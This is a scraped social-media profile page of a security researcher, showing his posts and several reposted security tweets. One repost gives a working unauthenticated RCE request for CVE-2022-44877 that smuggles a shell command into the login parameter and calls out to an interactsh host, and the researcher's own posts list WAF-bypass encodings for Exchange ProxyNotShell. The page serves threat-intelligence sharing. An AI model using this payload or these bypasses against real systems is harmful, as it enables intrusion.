livingbeef Profile Banner
Barak Sternberg Profile
Barak Sternberg

@livingbeef

Followers
291
Following
6K
Media
28
Statuses
289

Founder @ WildPointer | DEFCON Speaker | [email protected]

Tel Aviv
Joined January 2015
Don't wanna be here? Send us removal request.
@livingbeef
Barak Sternberg
3 years
๐Ÿ”Š "Wild IoT Tales" Talk is OUT! Learn about Latest Hackers' TTP's, Reverse-Engineer Industroyer2, Learn about New Conti Ransomware Strains and astonishing recent attack stories over critical infrastructures! ๐Ÿ”Š REC: https://t.co/t6LVWxlsCu ๐Ÿ”Š SLIDES:
lnkd.in
This link will take you to a page thatโ€™s not on LinkedIn
0
1
4
@7h3h4ckv157
7h3h4ckv157
2 years
This was the random link I found on LinkedIn, which contains the BugBounty guide! Source: https://t.co/CgbjdQ4GSr I don't know about the quality of the material, just sharing coz maybe it helps #infosec #bugbountytips #Resource #Hacking #infosecurity #CyberSecurity
9
242
789
@A3h1nt
A3h1nt
2 years
For those of you who are finding #SharePoint Pre-Auth #RCE ( #CVE-2023-29357 + CVE-2023โ€“24955 ) too technical to understand, here's a simplified version. ๐Ÿงต(0/n)
4
77
267
@win3zz
Bipin Jitiya
2 years
19
283
1K
@TheHackersNews
The Hacker News
3 years
Critical RCE flaw (CVE-2023-29017) discovered in popular #JavaScript sandbox module vm2. All versions, including 3.9.14 and prior, affected. Learn more: https://t.co/WTT6JtMFx8 #cybersecurity #informationsecurity
Tweet card summary image
thehackernews.com
Critical RCE flaw (CVE-2023-29017) discovered in popular JavaScript sandbox module vm2. All versions, including 3.9.14 and prior, affected.
1
32
53
@an0n_r0
an0n
3 years
Played with Outlook CVE-2023-23397. Made a simple PoC email builder & sender featuring malicious reminder (just a Msg, no need to use a Task or Cal. Ev.). Critical 0-click account takeover on internal networks even after MS patch, no need to open the message on the victim side.
15
361
1K
@h0mbre_
h0mbre
3 years
you see, `syscall` actually calls `do_syscall`. which in turn calls `_do_syscall`. got it? and that turns around and calls `____syscall`. which is basically a wrapper for `__syscall`, that's where the magic happens. it does `arg->ops->syscall` which was set in a diff code path.
30
112
1K
@_0xf4n9x_
_0xf4n9x_
3 years
#CVE-2022-44877 Control Web Panel Unauth #RCE POC: POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1 Host: vuln Content-Type: application/x-www-form-urlencoded username=root&password=toor&commit=Login
10
152
440
@livingbeef
Barak Sternberg
3 years
lol
@forrestbrazeal
Forrest Brazeal
3 years
good morning and welcome to 2023
2
0
0
@Cyburgerim
Cyburger
3 years
1/ ื—ืœืืก ืขื cyber product feature parity ๐Ÿฅฑ ื”ื’ื™ืข ื”ื–ืžืŸ ืœ cyber VC startup parity ๐Ÿ’ก ื™ืฆืืชื™ ืœื‘ื“ื•ืง 5 ืงืจื ื•ืช ืกื™ื™ื‘ืจ ื™ืฉืจืืœื™ื•ืช ืขื 71(!) ืกื˜ืืจื˜ืืคื™ื ๐Ÿ’ช โ“ืื™ื–ื• ืงื˜ื’ื•ืจื™ื” ื™ื™ื—ื•ื“ื™ืช ืœื›ืœ ืงืจืŸ? ืื™ืœื• ืงืจื ื•ืช ืขื ืคื•ืจื˜ืคื•ืœื™ื• ื“ื•ืžื”? ๐Ÿ’ฐ ืžืžื™ ื™ื•ืฆืื™ื ื”ื›ื™ ื”ืจื‘ื” ืืงื–ื™ื˜ื™ื? ๐Ÿฆ„ื™ื•ื ื™ืงื•ืจื ื™ื? ื›ืœ ื”ืคืจื˜ื™ื ื‘ืกื•ืฃ ๐Ÿ‘‡ ืขื•ืฉื™ื ืกื“ืจ๐Ÿงต
10
4
80
@bruce30262
Bruce Chen
3 years
Me and Billy ( @st424204 ) created a series of pwn challenges called Fourchain for this year's HITCON CTF. Here are the posts about the Browser & Hypervisor part of the challenge: Browser : https://t.co/8S1jAc5ADo Hypervisor: https://t.co/u5JI8Riilv Enjoy ! #HITCONCTF2022
bruce30262.github.io
Intro
0
75
226
@Rhynorater
Justin Gardner
3 years
Prerequisite knowledge before starting to learn about web vulns: * Can you explain from start to finish what happens when a URL gets placed into the URL bar? * Do you know how DNS works? * Do you know about TCP connections? * Do you know how to read HTTP requests and responses?
13
127
515
@shubroski
Shubhro Saha
3 years
This weekend I built =GPT3(), a way to run GPT-3 prompts in Google Sheets. It's incredible how tasks that are hard or impossible to do w/ regular formulas become trivial. For example: sanitize data, write thank you cards, summarize product reviews, categorize feedback...
327
3K
20K
@Horizon3Attack
Horizon3 Attack Team
3 years
Another appliance vuln down... CVE-2022-40684, affecting multiple #Fortinet solutions, is an auth bypass that allows remote attackers to interact with all management API endpoints. Blog post and POC coming later this week. Patch now.
17
438
1K
@livingbeef
Barak Sternberg
3 years
*Instead of writing full emails like with .com and such: %XX@%YY.%ZZ..%WW etc
0
0
1
@livingbeef
Barak Sternberg
3 years
Lower Casing powershell as well: */powershell/ instead of Powershell
0
0
0
@livingbeef
Barak Sternberg
3 years
Probably WAF Bypasses Observed IN-THE-WILD for Exchange Zero-Days (CVE-2022-41040, etc..) #ProxyNotShell #exchangerce *Instead of writing Email / autodiscover: Em%61il=%61utodiscover/%61utodiscover.json? *Instead of writing ".json": %61utodiscover.jso%6E?
3
3
2
@Markak_
Zhenpeng Lin
3 years
The latest Google Pixel 6 pwned with a 0day in kernel! Achieved arbitrary read/write to escalate privilege and disable SELinux without hijacking control flow. The bug also affects Pixel 6 Pro, other Pixels are not affected :)
40
269
1K